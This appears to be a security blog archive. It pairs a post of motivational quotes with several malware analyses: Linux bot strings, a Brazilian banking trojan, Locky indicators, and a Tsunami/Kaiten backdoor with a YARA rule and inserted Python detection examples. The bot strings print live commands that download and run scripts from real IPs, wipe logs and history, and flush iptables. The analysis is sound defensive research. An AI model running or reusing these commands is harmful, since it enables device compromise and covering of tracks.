Saturday, September 23, 2017

Quotes from Successful People

Albert Einstein


  • Imagination is more important than knowledge.
  • Insanity: doing the same thing over and over again and expecting different results.
  • No problem can be solved from the same level of consciousness that created it.
  • The important thing is not to stop questioning. Curiosity has its own reason for existing.
  • Life is like riding a bicycle. To keep your balance you must keep moving.
  • Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.
  • Look deep into nature, and then you will understand everything better.
  • Try not to become a man of success, but rather try to become a man of value.
  • I have no special talents. I am only passionately curious.
  • Everything should be made as simple as possible, but not simpler.



Bill Gates


  • Life is not fair, get used to it (quite honest)
  • Success is a lousy teacher. It seduces smart people into thinking they can't lose.
  • If you can't make it good, at least make it look good.
  • I believe that if you show people the problems and you show them the solutions they will be moved to act.



Steve Jobs


  • Your time is limited, so don’t waste it living someone else’s life.
  • I want to put a ding in the universe.
  • We hire people who want to make the best things in the world.
  • Sometimes life is going to hit you in the head with a brick. Don't lose faith.
  • Being the richest man in the cemetery doesn't matter to me. Going to bed at night saying we've done something wonderful, that's what matters to me.
  • Sometimes when you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations.
  • Design is not just what it looks like and feels like. Design is how it works.
  • Innovation distinguishes between a leader and a follower.



Mark Zuckerberg


  • Done is better than perfect.
  • I think a simple rule of business is, if you do the things that are easier first, then you can actually make a lot of progress.



Jack Ma

See beyond your circumstances. No matter what your current condition, how or where you grew up, or what education or training you feel you lack, you can be successful in your chosen endeavour.


Henry Ford


  • Failure is the only opportunity to begin again more intelligently.
  • If you think you can do a thing or think you can't do a thing, you're right.
  • A business that makes nothing but money is a poor business.
  • Don't find fault, find a remedy.



Michael Jordan

Accept failure, but keep trying.


Walt Disney

Keep moving forward.


Muhammad Ali


  • I hated every minute of training, but I said, 'Don't quit. Suffer now and live the rest of your life as a champion.'
  • Don't count the days, make the days count.
  • He who is not courageous enough to take risks will accomplish nothing in life.
  • I am the greatest, I said that even before I knew I was.
  • If you even dream of beating me you'd better wake up and apologize.
  • I'm so fast that last night I turned off the light switch in my hotel room and was in bed before the room was dark.
  • The fight is won or lost far away from witnesses - behind the lines, in the gym, and out there on the road, long before I dance under those lights.


And success tips from Arnold Schwarzenegger


Post created for inspiring billions
by
newWorld

Saturday, September 9, 2017

Analysis of recent Linux malware

Today we received a Linux malware sample for analysis.
MD5: 26413FD652A4ABB3FCA4A936DE6A4736

remnux@remnux:~/Downloads$ file ntpd
ntpd: ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

This sample appears to be an attack bot. Let's look at the strings:


Other interesting strings:

00000001E289   00000001E289      0   [0;31mSuccessfully Bruteforced IP: 
00000001E2AD   00000001E2AD      0   [0;33m%s | 
00000001E2B9   00000001E2B9      0   [0;31mUsername: 
00000001E2CA   00000001E2CA      0   [0;33m%s | 
00000001E2D6   00000001E2D6      0   [0;31mPassword: 
00000001E2E7   00000001E2E7      0   [0;33m%s
00000001E2F4   00000001E2F4      0   REPORT %s:%s:%s
00000001E324   00000001E324      0   %s cd /var/; rm -rf tftp; wget http://89.38.96.67/tftp || tftp -r tftp -g 89.38.96.67; chmod 777 tftp; ./tftp; rm -rf tftp
00000001E3A8   00000001E3A8      0   cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.177.172.221/John.sh ; chmod 777 John.sh; sh John.sh; tftp 94.177.172.221 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh; tftp -r tftp22.sh -g 94.177.172.221; chmod 777 tftp22.sh; sh tftp22.sh; ftpget -v -u anonymous -p anonymous -P 21 94.177.172.221 ftp11.sh ftp11.sh; sh ftp11.sh; rm -rf John.sh tftp11.sh tftp22.sh ftp11.sh;rm -rf *;history -c
00000001E550   00000001E550      0   jackmy*
00000001E558   00000001E558      0   busybox*
00000001E574   00000001E574      0   tftp*
00000001E584   00000001E584      0   mipsel*
00000001E58C   00000001E58C      0   mips*
00000001E594   00000001E594      0   mips64*
00000001E59C   00000001E59C      0   i686*
00000001E5A4   00000001E5A4      0   sparc*
00000001E5BC   00000001E5BC      0   jackmeoff*
00000001E5C8   00000001E5C8      0   hackz*
00000001E5D0   00000001E5D0      0   bruv*
00000001E5E0   00000001E5E0      0   armv*
00000001E5E8   00000001E5E8      0   ntpd*
00000001E5F0   00000001E5F0      0   shitty*
00000001E5F8   00000001E5F8      0   jack*
00000001E618   00000001E618      0   mipsel
00000001E63C   00000001E63C      0   /dev/netslink/
00000001E64C   00000001E64C      0   /tmp/
00000001E654   00000001E654      0   /var/
00000001E65C   00000001E65C      0   /dev/
00000001E664   00000001E664      0   /var/run/
00000001E670   00000001E670      0   /dev/shm/
00000001E67C   00000001E67C      0   /mnt/
00000001E684   00000001E684      0   /boot/
00000001E68C   00000001E68C      0   /usr/
00000001E694   00000001E694      0   >%s.t && cd %s && for a in 
00000001E6B0   00000001E6B0      0   ls -a %s
00000001E6B9   00000001E6B9      0   ; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
00000001E6F8   00000001E6F8      0   >%s.t && cd %s ; >retrieve
00000001E718   00000001E718      0   pkill -9 %s
00000001E728   00000001E728      0   rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
00000001E754   00000001E754      0   rm -rf /var/log/wtmp
00000001E76C   00000001E76C      0   history -c;history -w
00000001E784   00000001E784      0   rm -rf /tmp/*
00000001E794   00000001E794      0   history -c
00000001E7A0   00000001E7A0      0   rm -rf ~/.bash_history
00000001E7B8   00000001E7B8      0   rm -rf /bin/netstat
00000001E7CC   00000001E7CC      0   history -w
00000001E7D8   00000001E7D8      0   pkill -9 busybox
00000001E7EC   00000001E7EC      0   pkill -9 perl
00000001E7FC   00000001E7FC      0   service iptables stop
00000001E814   00000001E814      0   /sbin/iptables -F;/sbin/iptables -X
00000001E838   00000001E838      0   close
00000001E840   00000001E840      0   keep-alive
00000001E84C   00000001E84C      0   accept
00000001FBB4   00000001FBB4      0   %s %s HTTP/1.1
00000001FBC4   00000001FBC4      0   Connection: %s
00000001FBD4   00000001FBD4      0   Accept: */*
00000001FBE1   00000001FBE1      0   User-Agent: %s

Post made by

Analysis of Brazilian Banker malware

Executive summary
Brazilian banker malware is a popular family of banking malware that targets South America; malware researchers refer to it as SA-Banker or Brazilian Banker. The actors behind it have used many campaigns to reach victims and lure them into entering their credentials in a fake application, which then passes the banking credentials on to the malware authors. Last week, a banking malware campaign that uses Facebook's content delivery network (CDN) caught our attention.
Campaign using FB CDN:

Security researchers are worried about the latest campaign because it uses Facebook's CDN, which makes it harder for security products to block.

Figure 1 CDN used in Brazilian banking malware
Last week's data from MalwareHunterTeam says that around 200 thousand people from Brazil opened the email. Refer to the following image from MalwareHunterTeam:

Figure 2 Email Infection stats

Our researchers dug deeper and obtained the malware samples for analysis. This campaign is purely targeted at Brazilian banking customers.
Analysis
File MD5: 76E3E02AD689AF06699205D5BE956894
Size of the file: 752 KB

Figure 3 File submission

This sample was submitted to the system only two days ago and, as we said, the origin of the submission is Brazil. The file type is DLL.

Figure 4 Banker detection
We loaded the sample into PEiD to check the export details.
Figure 5 Export details of the malware sample
Further analysis will be published in the next post.

Post by


Wednesday, September 6, 2017

Locky download links for analysis (Pastebin link)

In our last post, Locky Ransomware Latest Infection - Indicator of Compromise (http://www.edison-newworld.com/2017/09/locky-ransomware-latest-infection.html), we posted the IOC (indicators of compromise) details of the famous Locky ransomware. Security researchers added a few more details in the following pastebin link:

https://pastebin.com/8esSAWFD

You can visit it and get the links, but we have also copied those links as an image.

Note: This is purely for research and malware analysis purposes, not for abuse.

https://www.virustotal.com/en/file/907f65e8a56dbd6328175c924987218d1d5e2eb144222f5fe5d1c52ad2647773/analysis/1504691819/
https://www.virustotal.com/en/file/045d4930f2d37a12d9a3b5725c777cd7b4ecdeffa2f6138809d2a12e42570f9f/analysis/1504691826/
https://www.virustotal.com/en/file/e75e5d374f20c386b1114252647cca7bd407190cafb26c6cfbd42c5f9223fe6c/analysis/1504691837/
https://www.virustotal.com/en/file/3ac9ab7ddd73531c3d5b7438f6bb74a7711c7f523770d61c338da4664993e7b1/analysis/1504691850/
https://www.virustotal.com/en/file/e6ddca65b517362123dfab0961f0735d738b7b3309568d021c533f1b19073666/analysis/150469188

Locky urls
Raw links locky

Post made by
newWorld researchers

Tuesday, September 5, 2017

Locky Ransomware Latest Infection - Indicator of Compromise:

IOC for the latest Locky ransomware infection:

Locky Infection URL:

hxxp://konferencjaora[.]pl/w/523f.php
hxxp://autonikos[.]pl/w/6dty.php
hxxp://oxfordschoolkotputli[.]com/w/vait.php
hxxp://j3[.]rodolfogn[.]com/w/qn0b.php
hxxp://martinagebhardt[.]hu/w/uol4.php

Regex created for these php file paths: \/w\/[0-9a-z]{4}\.php

Fake Dropbox landing pages which serve Locky ransomware:

Fake Dropbox link in the mail



Fake Dropbox landing page
It is advised to block these malicious URLs in the firewall; if you find any of these URLs in your proxy or firewall logs, it is an indication that your system has been infected.
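As an added example (not code from the post), here is a small Python check that turns indicators written in the post's defanged notation (hxxp://, [.]) back into hostnames, and runs the post's regex and the resulting host blocklist over proxy log lines; the indicator hosts and log lines below are constructed placeholders, and the log format (epoch, client, status, method, URL) is an assumption.

```python
import re
from urllib.parse import urlsplit

# Regex from the post: Locky php droppers live under /w/<four [0-9a-z] chars>.php
LOCKY_PATH_RE = re.compile(r"/w/[0-9a-z]{4}\.php")

# Constructed indicators in the post's defanged notation; hosts are placeholders.
CONSTRUCTED_IOCS = [
    "hxxp://fake-dropbox-landing[.]test/dropbox.html",
    "hxxp://example-infection[.]test/w/ab12.php",
]

# Constructed proxy log lines: "<epoch> <client> <status> <method> <url>" (assumed format)
CONSTRUCTED_PROXY_LOG = """\
1504691819.101 10.0.0.5 TCP_MISS/200 GET http://www.example.org/index.html
1504691820.455 10.0.0.7 TCP_MISS/200 GET http://fake-dropbox-landing.test/dropbox.html
1504691821.902 10.0.0.7 TCP_MISS/200 GET http://other-host.test/w/9k2q.php?x=1
1504691822.333 10.0.0.9 TCP_MISS/200 GET http://www.example.org/w/index.php
"""


def refang(ioc: str) -> str:
    """Turn hxxp://host[.]tld back into a real URL so it can be compared with log data."""
    return (ioc.replace("hxxps://", "https://").replace("hxxp://", "http://")
               .replace("[.]", ".").replace("(.)", "."))


def host_of(url: str) -> str:
    """Lower-cased hostname of a URL; scheme-less input is treated as http."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def build_blocklist(defanged_iocs) -> set:
    """Set of hostnames to block, derived from the defanged indicator list."""
    return {host_of(refang(ioc)) for ioc in defanged_iocs}


def classify(url: str, blocklist: set):
    """Return why a URL is suspicious ('blocklisted-host' or 'locky-path-pattern'), else None."""
    if host_of(url) in blocklist:
        return "blocklisted-host"
    # Match the path only, so query strings cannot hide or fake the pattern.
    if LOCKY_PATH_RE.search(urlsplit(url).path):
        return "locky-path-pattern"
    return None


def scan_log(lines, blocklist: set) -> list:
    """Return (client, url, reason) for every hit; clients listed here need investigation."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[4]
        reason = classify(url, blocklist)
        if reason:
            hits.append((client, url, reason))
    return hits


if __name__ == "__main__":
    for client, url, reason in scan_log(CONSTRUCTED_PROXY_LOG.splitlines(),
                                        build_blocklist(CONSTRUCTED_IOCS)):
        print(f"{client} -> {url} [{reason}]")
```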

Post made by
newWorld researchers


Sunday, September 3, 2017

Linux/Tsunami Malware Captured from honeypot

Today we got a shell file which was captured from a honeypot and submitted to VT. We checked the detection for that file and it was flagged as Linux/Tsunami.NJH. We looked directly into the contents of the shell script and it seems to be a generic downloader.
Figure 1 Linux/Tsunami.NJH
The script contains the same IP address throughout the file: 46.218.149(.)85. We checked this IP address together with those file directories in VT, and it actually downloads a malicious ELF file. We moved to the detection page and it got similar hits, where ESET detects it as a variant of Linux/Tsunami.NCD. The family description for this variant says that it is a backdoor and can be controlled remotely. The main purposes of this malware are to download other malware files from the server, perform DDoS attacks and execute shell commands.

Downloaded files - analysis

Based on these details, we manually downloaded the important files and started our analysis. We began with string analysis of these files to get an idea of what they do. All three files we downloaded contain junk strings, plus two lines of strings which at least look like Japanese words. Refer to the snapshot below:

Figure 2 Strings of all the three files

  • 0000000A5069   0000000A5069    nandemo shiranai wa yo,
  • 0000000A5084   0000000A5084    shitteru koto dake

String analysis – Based on Google search results

When we read those strings they look like Japanese words, so we checked on Google. Yes, they are Japanese and mean “I don’t know anything” and “only I know”. But a plain Google search also leads to some interesting posts, such as Funtime Ninja codes and DDoS router malware.


Figure 3 Funtimes Ninja Malware

TFTP is a protocol for transferring data that servers use to boot diskless workstations, X-terminals, and routers, running over the User Datagram Protocol (UDP). TFTP was primarily designed to read or write files on a remote server. Here busybox is found in all the loops of the script, hinting that it could target resource-limited Linux machines (i.e. Linux on embedded systems).

Let’s move on to the next one, the DDoS router malware article, where we found the following YARA rule to detect the presence of router DDoS malware:

import "elf"
rule STD
{
    meta:
        author = "Akamai SIRT"
        description = "Kaiten/STD DDoS malware"
    strings:
        $s0 = "shitteru koto dake"
        $s1 = "nandemo wa shiranai wa yo,"
    condition:
        elf.number_of_sections == 0 and
        elf.number_of_segments == 2 and
        $s0 and $s1
}

This YARA rule was created by researchers from Akamai for the Kaiten/STD router DDoS malware.

Figure 4 DDoS Campaign
The above graph from Akamai shows the DDoS campaign from different locations across the globe.

Static analysis of the downloaded files

We ran the file command to check the properties of these files, and they were reported as valid ELF files.

Figure 5 File command elf

Figure 6 ELF Header
When we try to disassemble these files we face the following warnings:
  • Warning: read (shdr) at 0xffff
  • Warning: Cannot initialize section headers
  • Warning: Cannot initialize strings table
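As an added example (not code from the post or from Akamai), here is a small Python parser for the ELF header fields that the quoted rule tests (elf.number_of_sections is e_shnum, elf.number_of_segments is e_phnum) together with a check that explains why a section header table cannot be read, as in the warnings above; the input is a constructed big-endian MIPS ELF32 header followed by the rule's two strings, not a real sample.

```python
import struct

ELF_MAGIC = b"\x7fELF"
# Literals from the Akamai Kaiten/STD rule quoted in the post.
STD_STRINGS = (b"shitteru koto dake", b"nandemo wa shiranai wa yo,")


def parse_elf_header(data: bytes) -> dict:
    """Parse e_ident plus the ELF32/ELF64 file header, honouring EI_DATA (endianness)."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    end = "<" if ei_data == 1 else ">"
    # e_type e_machine e_version e_entry e_phoff e_shoff e_flags
    # e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx
    fmt = end + ("HHIIIIIHHHHHH" if ei_class == 1 else "HHIQQQIHHHHHH")
    if len(data) < 16 + struct.calcsize(fmt):
        raise ValueError("truncated ELF header")
    names = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff",
             "e_flags", "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize",
             "e_shnum", "e_shstrndx")
    hdr = dict(zip(names, struct.unpack_from(fmt, data, 16)))
    hdr["bits"] = 32 if ei_class == 1 else 64
    hdr["endian"] = "little" if ei_data == 1 else "big"
    return hdr


def section_table_problems(hdr: dict, file_size: int) -> list:
    """Explain readelf-style warnings: a section header table that cannot be read."""
    problems = []
    if hdr["e_shnum"] == 0:
        problems.append("no section headers (e_shnum == 0)")
        return problems
    end_of_table = hdr["e_shoff"] + hdr["e_shnum"] * hdr["e_shentsize"]
    if hdr["e_shoff"] >= file_size or end_of_table > file_size:
        problems.append("section header table at 0x%x lies outside the file" % hdr["e_shoff"])
    if hdr["e_shstrndx"] >= hdr["e_shnum"]:
        problems.append("e_shstrndx points past the section table (no strings table)")
    return problems


def matches_std_rule(data: bytes) -> bool:
    """Evaluate the quoted rule's condition without yara: 0 sections, 2 segments, both strings."""
    try:
        hdr = parse_elf_header(data)
    except ValueError:
        return False
    return (hdr["e_shnum"] == 0 and hdr["e_phnum"] == 2
            and all(s in data for s in STD_STRINGS))


def build_constructed_sample(shnum: int = 0, shoff: int = 0xFFFF) -> bytes:
    """Constructed input, not a real sample: big-endian ELF32 MIPS header + the STD strings."""
    ident = ELF_MAGIC + bytes([1, 2, 1, 0]) + b"\x00" * 8   # ELF32, big-endian, version 1
    hdr = struct.pack(">HHIIIIIHHHHHH",
                      2, 8, 1, 0x00400000,   # ET_EXEC, EM_MIPS, EV_CURRENT, e_entry
                      52, shoff, 0,          # e_phoff, e_shoff (0xffff as in the warning), e_flags
                      52, 32, 2,             # e_ehsize, e_phentsize, e_phnum
                      40, shnum, 0)          # e_shentsize, e_shnum, e_shstrndx
    body = b"\x00" * 64 + b"\x00".join(STD_STRINGS) + b"\x00"
    return ident + hdr + body


if __name__ == "__main__":
    sample = build_constructed_sample()
    hdr = parse_elf_header(sample)
    print(hdr["bits"], hdr["endian"], "sections:", hdr["e_shnum"], "segments:", hdr["e_phnum"])
    print("STD rule matches:", matches_std_rule(sample))
    print(section_table_problems(hdr, len(sample)))
```

Note that the rule's literal "nandemo wa shiranai wa yo," differs from the string "nandemo shiranai wa yo," shown in the dump above, so the rule as quoted would only match files carrying the former.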

Using the initial script with a few download-related lines tweaked, execution now fails with an "exec format error".
Figure 7 Execution error
Conclusion

Based on the AV detection and string analysis, these files are found to be backdoors with DDoS functionality. It is highly recommended to block the malicious IP address in the firewall and proxy. A good SOC with a better threat intelligence feed will minimise the attack and even stop it before it creates any damage.


Research done by
